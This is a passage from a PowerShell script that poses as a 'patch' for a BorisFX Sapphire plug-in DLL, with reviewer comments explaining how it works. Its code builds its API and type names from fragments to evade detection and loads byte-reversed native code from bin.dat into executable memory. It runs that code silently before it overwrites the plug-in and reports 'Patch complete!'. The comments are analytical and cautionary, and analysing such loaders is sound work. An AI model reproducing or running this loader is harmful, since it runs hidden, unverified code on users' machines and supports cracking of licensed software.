    $del = $bu.CreateType();
    return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $del);
}

# Reviewer note: resolves an exported native function by name without DllImport.
# It reaches the internal Microsoft.Win32.UnsafeNativeMethods type inside
# System.dll (the type name is assembled from fragments so it does not appear as one
# string), calls its GetModuleHandle / GetProcAddress wrappers, and hands the
# resulting address to Get-Ptr. The fragment concatenation and reflective lookup
# are the main reasons this script reads as evasive rather than as a plain patcher.
#   $module  - DLL name passed to GetModuleHandle (must already be loaded)
#   $name    - export name passed to GetProcAddress
#   $params, $rettype - delegate signature, forwarded to Get-Ptr
function Get-Func {
    param (
        [string]
        $module,
        [string]
        $name,
        [type[]]
        $params,
        [type]
        $rettype
    )
    $na = $assemblies['System.dll'].GetType(('Microsoft' + '.Win32.' + 'UnsafeN' + 'ativeMethods'));
    $gp = $na.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));
    $md = $na.GetMethod('GetModuleHandle').Invoke($null, @($module));
    $ptr = $gp.Invoke($null, @(([System.Runtime.InteropServices.HandleRef]::new([object]::new(), $md)), $name));
    return Get-Ptr $ptr $params $rettype;
}

# Reviewer note: this is the part to be suspicious of. The name "VirtualAlloc" is
# assembled one character at a time (so the string never appears whole), resolved
# from Kernel32.dll through Get-Func, and used to allocate 5920 bytes with
# allocationType 12288 (0x3000, MEM_COMMIT | MEM_RESERVE) and protect 64 (0x40,
# PAGE_EXECUTE_READWRITE). The first 5920 bytes of bin.dat, byte-reversed, are
# copied into that executable region and then *called* as a function, receiving a
# pointer to the next 1,792,000 bytes of bin.dat (also reversed, in plain heap memory).
# In other words the script is a loader: the real behaviour lives in bin.dat, which
# the script does not display or verify, and it runs with this user's privileges.
# Whether it is "just a patcher" cannot be decided from the script; the native blob
# needs analysis in an isolated VM, and the byte reversal is the only decoding step
# required to recover it from bin.dat.
$fname = 'V';
$fname += 'i';
$fname += 'r';
$fname += 't';
$fname += 'u';
$fname += 'a';
$fname += 'l';
$fname += 'A';
$fname += 'l';
$fname += 'l';
$fname += 'o';
$fname += 'c';
$func = Get-Func 'Kernel32.dll' $fname @([IntPtr], [IntPtr], [uint32], [uint32]) ([IntPtr]);

# Reverse-in-place "decoding" of the two regions of bin.dat used below.
[Array]::Reverse($dat, 0, 5920);
[Array]::Reverse($dat, 5920, 1792000);
# VirtualAlloc(NULL, 5920, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
$patch = $func.Invoke(0, 5920, 12288, 64);
[Runtime.InteropServices.Marshal]::Copy($dat, 0, $patch, 5920);
# The copied bytes become a callable function with signature (uint32, ptr, ptr, ptr).
$patchfunc = Get-Ptr $patch @([uint32], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr]);
$patch2 = [Runtime.InteropServices.Marshal]::AllocHGlobal(1792000);
[Runtime.InteropServices.Marshal]::Copy($dat, 5920, $patch2, 1792000);
# Executes the bin.dat code in this PowerShell process.
$patchfunc.Invoke(0, $patch2, 1, 0);

# Reviewer note: writes a byte-reversed slice of bin.dat to disk as a file.
#   $path - destination; environment variables are expanded first
#   $pos  - start offset within $dat
#   $size - number of bytes to write
# The file is created (truncating any existing one) and any failure ends the script
# with a message box; the reversal mutates the shared $dat array in place. Note this
# runs only after the native code above has already executed, so a "write failed"
# message does not mean nothing happened.
function Copy-InstallFile {
    param (
        $path,
        $pos,
        $size
    )
    try {
        $path = [Environment]::ExpandEnvironmentVariables($path);
        [Array]::Reverse($dat, $pos, $size);
        $fs = [IO.File]::Create($path);
        $fs.Write($dat, $pos, $size);
        $fs.Dispose();
    }
    catch {
        [Windows.MessageBox]::Show("Failed write file $path, Make sure Application is not running.");
        exit(0);
    }
}

# Reviewer note: the visible "patch" action — 66,840,576 bytes from offset 1,797,920
# of bin.dat replace the plug-in DLL. This is the only step a user would expect from
# a patcher; the in-memory execution above happens silently before it. If you want to
# assess what ran, compare this DLL against a known-good copy and inspect the first
# 5920 (reversed) bytes of bin.dat.
Copy-InstallFile '%SystemDrive%\Program Files\BorisFX\Sapphire 2022.5 Adobe\lib64\sapphire_ae.dll' 1797920 66840576;


[Windows.MessageBox]::Show("Patch complete!");
exit(0);```
